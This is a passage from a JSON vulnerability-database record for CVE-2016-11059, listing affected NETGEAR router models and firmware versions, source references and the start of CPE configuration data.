"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "d3600",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.25"
},
{
"model": "d500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.49"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.61"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.67"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "d6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50 0.0.50"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.55"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.57"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "d6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.63"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.00.24"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.00.28"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.00.30"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.00.32"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.00.34"
},
{
"model": "d6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.00.36"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.55"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.106"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgnd3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.46"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "jnr1010",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.17"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.7"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.7"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.10j"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.1"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "r6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.14"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.46"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.60"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.64"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.66"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.68"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.80"
},
{
"model": "r6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.86"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6 10.1.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.20"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.30"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.06"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8 10.0.77"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.24"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.8"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.84"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.38"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.2"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.4"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.12"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.14"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.16"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.24"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.62"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.2 1.1.93"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.12"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.18"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.32"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.34"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.42"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.60"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.108"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.112"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.116"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.118"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.122"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.124"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.130"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.16"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.20"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.34"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.38"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.40"
},
{
"model": "r7500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.8"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.22"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.26"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.46"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.54"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.2"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.4"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.4 1.1.42"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.46"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "wndr3400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.86"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.88"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.92"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.46"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "wndr3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.88"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.90"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.92"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr4300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "wndr4500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.40"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.44"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.46"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.48"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "wnr1000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "wnr2000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.8"
},
{
"model": "wnr2500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr2500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.40"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.44"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.48"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.50"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.56"
},
{
"model": "wnr3500l",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.2.44 35.0.53na"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-11059"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014989"
},
{
"db": "NVD",
"id": "CVE-2016-11059"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:ac1450_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:c6300_firmware",
"vulnerable": true
},
{
